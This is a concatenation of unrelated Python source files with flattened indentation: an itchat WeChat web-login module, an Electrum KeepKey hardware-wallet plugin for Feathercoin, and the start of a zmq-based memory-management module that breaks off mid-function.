else:
name = None
cli.main(args=args, prog_name=name)
if __name__ == "__main__":
main(as_module=True)
|
login.py
|
import os, sys, time, re, io
import threading
import json, xml.dom.minidom
import copy, pickle, random
import traceback, logging
import requests
from pyqrcode import QRCode
from .. import config, utils
from ..returnvalues import ReturnValue
from ..storage.templates import wrap_user_dict
from .contact import update_local_chatrooms, update_local_friends
from .messages import produce_msg
logger = logging.getLogger('itchat')
def load_login(core):
core.login = login
core.get_QRuuid = get_QRuuid
core.get_QR = get_QR
core.check_login = check_login
core.web_init = web_init
core.show_mobile_login = show_mobile_login
core.start_receiving = start_receiving
core.get_msg = get_msg
core.logout = logout
def login(self, enableCmdQR=False, picDir=None, qrCallback=None,
loginCallback=None, exitCallback=None):
if self.alive or self.isLogging:
logger.warning('itchat has already logged in.')
return
self.isLogging = True
while self.isLogging:
uuid = push_login(self)
if uuid:
qrStorage = io.BytesIO()
else:
logger.info('Getting uuid of QR code.')
while not self.get_QRuuid():
time.sleep(1)
logger.info('Downloading QR code.')
qrStorage = self.get_QR(enableCmdQR=enableCmdQR,
picDir=picDir, qrCallback=qrCallback)
logger.info('Please scan the QR code to log in.')
isLoggedIn = False
while not isLoggedIn:
status = self.check_login()
if hasattr(qrCallback, '__call__'):
qrCallback(uuid=self.uuid, status=status, qrcode=qrStorage.getvalue())
if status == '200':
isLoggedIn = True
elif status == '201':
if isLoggedIn is not None:
logger.info('Please press confirm on your phone.')
isLoggedIn = None
elif status != '408':
break
if isLoggedIn:
break
logger.info('Log in time out, reloading QR code.')
else:
return # log in process is stopped by user
logger.info('Loading the contact, this may take a little while.')
self.web_init()
self.show_mobile_login()
self.get_contact(True)
if hasattr(loginCallback, '__call__'):
r = loginCallback()
else:
utils.clear_screen()
if os.path.exists(picDir or config.DEFAULT_QR):
os.remove(picDir or config.DEFAULT_QR)
logger.info('Login successfully as %s' % self.storageClass.nickName)
self.start_receiving(exitCallback)
self.isLogging = False
def push_login(core):
cookiesDict = core.s.cookies.get_dict()
if 'wxuin' in cookiesDict:
url = '%s/cgi-bin/mmwebwx-bin/webwxpushloginurl?uin=%s' % (
config.BASE_URL, cookiesDict['wxuin'])
headers = { 'User-Agent' : config.USER_AGENT }
r = core.s.get(url, headers=headers).json()
if 'uuid' in r and r.get('ret') in (0, '0'):
core.uuid = r['uuid']
return r['uuid']
return False
def get_QRuuid(self):
url = '%s/jslogin' % config.BASE_URL
params = {
'appid' : 'wx782c26e4c19acffb',
'fun' : 'new', }
headers = { 'User-Agent' : config.USER_AGENT }
r = self.s.get(url, params=params, headers=headers)
regx = r'window.QRLogin.code = (\d+); window.QRLogin.uuid = "(\S+?)";'
data = re.search(regx, r.text)
if data and data.group(1) == '200':
self.uuid = data.group(2)
return self.uuid
def get_QR(self, uuid=None, enableCmdQR=False, picDir=None, qrCallback=None):
uuid = uuid or self.uuid
picDir = picDir or config.DEFAULT_QR
qrStorage = io.BytesIO()
qrCode = QRCode('https://login.weixin.qq.com/l/' + uuid)
qrCode.png(qrStorage, scale=10)
if hasattr(qrCallback, '__call__'):
qrCallback(uuid=uuid, status='0', qrcode=qrStorage.getvalue())
else:
if enableCmdQR:
utils.print_cmd_qr(qrCode.text(1), enableCmdQR=enableCmdQR)
else:
with open(picDir, 'wb') as f:
f.write(qrStorage.getvalue())
utils.print_qr(picDir)
return qrStorage
def check_login(self, uuid=None):
uuid = uuid or self.uuid
url = '%s/cgi-bin/mmwebwx-bin/login' % config.BASE_URL
localTime = int(time.time())
params = 'loginicon=true&uuid=%s&tip=0&r=%s&_=%s' % (
uuid, localTime / 1579, localTime)
headers = { 'User-Agent' : config.USER_AGENT }
r = self.s.get(url, params=params, headers=headers)
regx = r'window.code=(\d+)'
data = re.search(regx, r.text)
if data and data.group(1) == '200':
process_login_info(self, r.text)
return '200'
elif data:
return data.group(1)
else:
return '400'
def process_login_info(core, loginContent):
''' when finish login (scanning qrcode)
* syncUrl and fileUploadingUrl will be fetched
* deviceid and msgid will be generated
* skey, wxsid, wxuin, pass_ticket will be fetched
'''
regx = r'window.redirect_uri="(\S+)";'
core.loginInfo['url'] = re.search(regx, loginContent).group(1)
headers = { 'User-Agent' : config.USER_AGENT }
r = core.s.get(core.loginInfo['url'], headers=headers, allow_redirects=False)
core.loginInfo['url'] = core.loginInfo['url'][:core.loginInfo['url'].rfind('/')]
for indexUrl, detailedUrl in (
("wx2.qq.com" , ("file.wx2.qq.com", "webpush.wx2.qq.com")),
("wx8.qq.com" , ("file.wx8.qq.com", "webpush.wx8.qq.com")),
("qq.com" , ("file.wx.qq.com", "webpush.wx.qq.com")),
("web2.wechat.com" , ("file.web2.wechat.com", "webpush.web2.wechat.com")),
("wechat.com" , ("file.web.wechat.com", "webpush.web.wechat.com"))):
fileUrl, syncUrl = ['https://%s/cgi-bin/mmwebwx-bin' % url for url in detailedUrl]
if indexUrl in core.loginInfo['url']:
core.loginInfo['fileUrl'], core.loginInfo['syncUrl'] = \
fileUrl, syncUrl
break
else:
core.loginInfo['fileUrl'] = core.loginInfo['syncUrl'] = core.loginInfo['url']
core.loginInfo['deviceid'] = 'e' + repr(random.random())[2:17]
core.loginInfo['BaseRequest'] = {}
for node in xml.dom.minidom.parseString(r.text).documentElement.childNodes:
if node.nodeName == 'skey':
core.loginInfo['skey'] = core.loginInfo['BaseRequest']['Skey'] = node.childNodes[0].data
elif node.nodeName == 'wxsid':
core.loginInfo['wxsid'] = core.loginInfo['BaseRequest']['Sid'] = node.childNodes[0].data
elif node.nodeName == 'wxuin':
core.loginInfo['wxuin'] = core.loginInfo['BaseRequest']['Uin'] = node.childNodes[0].data
elif node.nodeName == 'pass_ticket':
core.loginInfo['pass_ticket'] = core.loginInfo['BaseRequest']['DeviceID'] = node.childNodes[0].data
def web_init(self):
url = '%s/webwxinit?r=%s' % (self.loginInfo['url'], int(time.time()))
data = { 'BaseRequest': self.loginInfo['BaseRequest'], }
headers = {
'ContentType': 'application/json; charset=UTF-8',
'User-Agent' : config.USER_AGENT, }
r = self.s.post(url, data=json.dumps(data), headers=headers)
dic = json.loads(r.content.decode('utf-8', 'replace'))
# deal with login info
utils.emoji_formatter(dic['User'], 'NickName')
self.loginInfo['InviteStartCount'] = int(dic['InviteStartCount'])
self.loginInfo['User'] = wrap_user_dict(utils.struct_friend_info(dic['User']))
self.memberList.append(self.loginInfo['User'])
self.loginInfo['SyncKey'] = dic['SyncKey']
self.loginInfo['synckey'] = '|'.join(['%s_%s' % (item['Key'], item['Val'])
for item in dic['SyncKey']['List']])
self.storageClass.userName = dic['User']['UserName']
self.storageClass.nickName = dic['User']['NickName']
# deal with contact list returned when init
contactList = dic.get('ContactList', [])
chatroomList, otherList = [], []
for m in contactList:
if m['Sex'] != 0:
otherList.append(m)
elif '@@' in m['UserName']:
m['MemberList'] = [] # don't let dirty info pollute the list
chatroomList.append(m)
elif '@' in m['UserName']:
# mp will be dealt in update_local_friends as well
otherList.append(m)
if chatroomList:
update_local_chatrooms(self, chatroomList)
if otherList:
update_local_friends(self, otherList)
return dic
def show_mobile_login(self):
url = '%s/webwxstatusnotify?lang=zh_CN&pass_ticket=%s' % (
self.loginInfo['url'], self.loginInfo['pass_ticket'])
data = {
'BaseRequest' : self.loginInfo['BaseRequest'],
'Code' : 3,
'FromUserName' : self.storageClass.userName,
'ToUserName' : self.storageClass.userName,
'ClientMsgId' : int(time.time()), }
headers = {
'ContentType': 'application/json; charset=UTF-8',
'User-Agent' : config.USER_AGENT, }
r = self.s.post(url, data=json.dumps(data), headers=headers)
return ReturnValue(rawResponse=r)
def start_receiving(self, exitCallback=None, getReceivingFnOnly=False):
self.alive = True
def maintain_loop():
retryCount = 0
while self.alive:
try:
i = sync_check(self)
if i is None:
self.alive = False
elif i == '0':
pass
else:
msgList, contactList = self.get_msg()
if msgList:
msgList = produce_msg(self, msgList)
for msg in msgList:
self.msgList.put(msg)
if contactList:
chatroomList, otherList = [], []
for contact in contactList:
if '@@' in contact['UserName']:
chatroomList.append(contact)
else:
otherList.append(contact)
chatroomMsg = update_local_chatrooms(self, chatroomList)
chatroomMsg['User'] = self.loginInfo['User']
self.msgList.put(chatroomMsg)
update_local_friends(self, otherList)
retryCount = 0
except:
retryCount += 1
logger.error(traceback.format_exc())
if self.receivingRetryCount < retryCount:
self.alive = False
else:
time.sleep(1)
self.logout()
if hasattr(exitCallback, '__call__'):
exitCallback()
else:
logger.info('LOG OUT!')
if getReceivingFnOnly:
return maintain_loop
else:
maintainThread = threading.Thread(target=maintain_loop)
maintainThread.setDaemon(True)
maintainThread.start()
def sync_check(self):
url = '%s/synccheck' % self.loginInfo.get('syncUrl', self.loginInfo['url'])
params = {
'r' : int(time.time() * 1000),
'skey' : self.loginInfo['skey'],
'sid' : self.loginInfo['wxsid'],
'uin' : self.loginInfo['wxuin'],
'deviceid' : self.loginInfo['deviceid'],
'synckey' : self.loginInfo['synckey'],
'_' : int(time.time() * 1000),}
headers = { 'User-Agent' : config.USER_AGENT }
r = self.s.get(url, params=params, headers=headers)
regx = r'window.synccheck={retcode:"(\d+)",selector:"(\d+)"}'
pm = re.search(regx, r.text)
if pm is None or pm.group(1) != '0':
logger.debug('Unexpected sync check result: %s' % r.text)
return None
return pm.group(2)
def get_msg(self):
url = '%s/webwxsync?sid=%s&skey=%s&pass_ticket=%s' % (
self.loginInfo['url'], self.loginInfo['wxsid'],
self.loginInfo['skey'],self.loginInfo['pass_ticket'])
data = {
'BaseRequest' : self.loginInfo['BaseRequest'],
'SyncKey' : self.loginInfo['SyncKey'],
'rr' : ~int(time.time()), }
headers = {
'ContentType': 'application/json; charset=UTF-8',
'User-Agent' : config.USER_AGENT }
r = self.s.post(url, data=json.dumps(data), headers=headers)
dic = json.loads(r.content.decode('utf-8', 'replace'))
if dic['BaseResponse']['Ret'] != 0: return None, None
self.loginInfo['SyncKey'] = dic['SyncCheckKey']
self.loginInfo['synckey'] = '|'.join(['%s_%s' % (item['Key'], item['Val'])
for item in dic['SyncCheckKey']['List']])
return dic['AddMsgList'], dic['ModContactList']
def logout(self):
if self.alive:
url = '%s/webwxlogout' % self.loginInfo['url']
params = {
'redirect' : 1,
'type' : 1,
'skey' : self.loginInfo['skey'], }
headers = { 'User-Agent' : config.USER_AGENT }
self.s.get(url, params=params, headers=headers)
self.alive = False
self.isLogging = False
self.s.cookies.clear()
del self.chatroomList[:]
del self.memberList[:]
del self.mpList[:]
return ReturnValue({'BaseResponse': {
'ErrMsg': 'logout successfully.',
'Ret': 0, }})
|
keepkey.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from electrum.util import bfh, bh2u, UserCancelled, UserFacingException
from electrum.bitcoin import TYPE_ADDRESS, TYPE_SCRIPT
from electrum.bip32 import BIP32Node
from electrum import constants
from electrum.i18n import _
from electrum.transaction import deserialize, Transaction
from electrum.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class KeepKey_KeyStore(Hardware_KeyStore):
hw_type = 'keepkey'
device = 'KeepKey'
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise UserFacingException(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class KeepKeyPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
firmware_URL = 'https://www.keepkey.com'
libraries_URL = 'https://github.com/keepkey/python-keepkey'
minimum_firmware = (1, 0, 0)
keystore_class = KeepKey_KeyStore
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
try:
from . import client
import keepkeylib
import keepkeylib.ckd_public
import keepkeylib.transport_hid
import keepkeylib.transport_webusb
self.client_class = client.KeepKeyClient
self.ckd_public = keepkeylib.ckd_public
self.types = keepkeylib.client.types
self.DEVICE_IDS = (keepkeylib.transport_hid.DEVICE_IDS +
keepkeylib.transport_webusb.DEVICE_IDS)
self.device_manager().register_devices(self.DEVICE_IDS)
self.libraries_available = True
except ImportError:
self.libraries_available = False
def hid_transport(self, pair):
from keepkeylib.transport_hid import HidTransport
return HidTransport(pair)
def webusb_transport(self, device):
from keepkeylib.transport_webusb import WebUsbTransport
for d in WebUsbTransport.enumerate():
if device.id_.startswith(d.getSerialNumber()):
return WebUsbTransport(d)
return WebUsbTransport(device)
def _try_hid(self, device):
self.logger.info("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.logger.info(f"cannot connect at {device.path} {e}")
return None
def _try_webusb(self, device):
self.logger.info("Trying to connect over WebUSB...")
try:
return self.webusb_transport(device)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
def create_client(self, device, handler):
if device.product_key[1] == 2:
transport = self._try_webusb(device)
else:
transport = self._try_hid(device)
if not transport:
self.logger.info("cannot connect to device")
return
self.logger.info(f"connected to device at {device.path}")
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.logger.info(f"ping failed {e}")
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.logger.info(msg)
if handler:
handler.show_error(msg)
else:
raise UserFacingException(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Feathercoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = self.types.HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise UserFacingException(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_keepkey_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_keepkey_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs,
lock_time=tx.locktime, version=tx.version)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 3):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
xpubs = wallet.get_master_public_keys()
if len(xpubs) == 1:
script_type = self.get_keepkey_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
else:
def f(xpub):
return self._make_node_path(xpub, [change, index])
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
pubkeys = list(map(f, sorted_xpubs))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * wallet.n,
m=wallet.m,
)
script_type = self.get_keepkey_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
txinputtype.script_type = self.get_keepkey_input_script_type(txin['type'])
else:
def f(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
return self._make_node_path(xpub, s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures')),
m=txin.get('num_sig'),
)
script_type = self.get_keepkey_input_script_type(txin['type'])
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx):
def create_output_by_derivation():
script_type = self.get_keepkey_output_script_type(info.script_type)
if len(xpubs) == 1:
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
address_n = self.client_class.expand_path("/%d/%d" % index)
pubkeys = [self._make_node_path(xpub, address_n) for xpub in xpubs]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for vout in d['outputs']:
o = t.bin_outputs.add()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
MemoryManagement.py
|
import Queue
from multiprocessing import Process
from cPickle import loads, dumps
from threading import Thread
import zmq
from time import time, sleep
from CellCycle.MemoryModule.Cache import CacheSlubLRU
from CellCycle.ChainModule.ListThread import ListThread
from CellCycle.ChainModule.ListCommunication import InternalChannel
SETCOMMAND = 0
GETCOMMAND = 1
SHUTDOWNCOMMAND = -1
TRANSFERMEMORY = 2
NEWMASTER = 3
TRANSFERCOMPLETE = 4
NEWSLAVE = 5
NEWSTART = 6
def startMemoryTask(settings, logger, master):
url_getBackend = "inproc://get_memory" + ("master" if master else "slave")
url_setBackend = "inproc://set_memory" + ("master" if master else "slave")
url_setFrontend = "tcp://*:" + str(settings.getMasterSetPort() if master else settings.getSlaveSetPort())
url_getFrontend = "tcp://*:" + str(settings.getMasterGetPort() if master else settings.getSlaveGetPort())
#create new process
processName = "python-CCMemoryMaster" if master else "python-CCMemorySlave"
p = Process(name=processName,target=_memoryTask, args=(settings, logger,master, url_setFrontend, url_getFrontend, url_getBackend, url_setBackend))
p.start()
return url_getBackend, url_setBackend, url_setFrontend, url_getFrontend
def _memoryTask(settings, logger,master, url_setFrontend, url_getFrontend, url_getBackend, url_setBackend):
from Cache import Slab, CacheSlubLRU
# grab settings
slabSize = settings.getSlabSize()
preallocatedPool = settings.getPreallocatedPool()
getterNumber = settings.getGetterThreadNumber()
# initialize cache
cache = CacheSlubLRU(preallocatedPool , slabSize, logger) #set as 10 mega, 1 mega per slab
#log
logger.debug("Memory Process initialized:" + str(preallocatedPool) + "B, get# = " + str(getterNumber))
# Prepare our context and sockets
context = zmq.Context.instance()
# Socket to talk to get
socketGetFrontend = context.socket(zmq.ROUTER)
socketGetFrontend.bind(url_getFrontend)
# Socket to talk to workers
socketGetBackend = context.socket(zmq.DEALER)
socketGetBackend.bind(url_getBackend)
timing = {}
timing["getters"] = []
timing["setters"] = [-1]
Thread(name='MemoryGetProxy',target=_proxyThread, args=(logger, master, socketGetFrontend, socketGetBackend, url_getFrontend, url_getBackend)).start()
for i in range(getterNumber):
timing["getters"].append(-1)
th = Thread(name='MemoryGetter',target=_getThread, args=(i,logger, settings, cache,master,url_getBackend, timing))
th.start()
slaveSetQueue = Queue.Queue()
hostState = {}
hostState["current"] = None
Thread(name='MemoryPerformanceMetricator',target=_memoryMetricatorThread, args=(logger, cache, settings, master, timing)).start()
Thread(name='MemorySlaveSetter',target=_setToSlaveThread, args=(logger,settings, cache,master,url_getBackend, slaveSetQueue, hostState)).start()
_setThread(logger, settings, cache,master,url_setFrontend,slaveSetQueue, hostState, timing)
def _memoryMetricatorThread(logger, cache, settings, master, timing):
if master:
period = settings.getScalePeriod()
setScaleDownLevel = settings.getSetScaleDownLevel() if settings.getSetScaleDownLevel() >0 else -float("inf")
setScaleUpLevel = settings.getSetScaleUpLevel() if settings.getSetScaleUpLevel() >0 else float("inf")
getScaleDownLevel = settings.getGetScaleDownLevel() if settings.getGetScaleDownLevel() >0 else -float("inf")
getScaleUpLevel = settings.getGetScaleUpLevel() if settings.getGetScaleUpLevel() >0 else float("inf")
logger.debug("Metricator alive, period: "+ str(period) +"s, getThrLevel: [" +str(getScaleDownLevel) +"," + str(getScaleUpLevel)+ "], setThrLevel: [" + str(setScaleDownLevel) + "," + str(setScaleUpLevel) + "]" )
# this channel is necessary to send scale up/down requests
internal_channel = InternalChannel(addr='127.0.0.1', port=settings.getIntPort(), logger=logger)
internal_channel.generate_internal_channel_client_side()
from random import gauss
sleep(60)
while True:
sleep(abs(gauss(period, period/10)))
locked = timing["setters"][0].isTransferring()
setMean = 1.0 - timing["setters"][0].calcMean()
getMean = 0.0
for metr in timing["getters"]:
getMean += 1.0 - metr.calcMean()
getMean = getMean / settings.getGetterThreadNumber()
logger.debug("Working time for setters: " + str(setMean) + ", getters (mean): " + str(getMean) )
# scale up needed
if getMean >= getScaleUpLevel or setMean >= setScaleUpLevel and not locked:
logger.debug("Requests for scale Up!")
# call scale up service
ListThread.notify_scale_up(internal_channel)
# self.list_communication_thread.notify_scale_up()
# scale down needed
elif getMean <= getScaleDownLevel and setMean <= setScaleDownLevel and not locked:
logger.debug("Requests for scale Down!")
# call scale down service
ListThread.notify_scale_down(internal_channel)
# self.list_communication_thread.notify_scale_down()
def _proxyThread(logger, master, frontend, backend, url_frontend, url_backend):
logger.debug("Routing from " + url_frontend + " to " + url_backend)
zmq.proxy(frontend, backend)
def _setToSlaveThread(logger,settings, cache, master,url, queue, hostState):
if(not master):
return
socket = zmq.Context.instance().socket(zmq.PUSH)
import time
while hostState["current"] is None:
logger.debug("cannot send to slave, net info: "+ str(hostState["current"]))
time.sleep(1)
slaveAddress = "tcp://"+hostState["current"].slave.ip + ":"+ str(settings.getSlaveSetPort())
socket.connect(slaveAddress)
oldAddress = "tcp://"+hostState["current"].slave.ip + ":"+ str(settings.getSlaveSetPort())
logger.debug("Finally I'm configured")
while True:
objToSend = queue.get()
if(slaveAddress != None):
sended = False
while( not sended):
try:
slaveAddress = "tcp://"+hostState["current"].slave.ip + ":"+ str(settings.getSlaveSetPort())
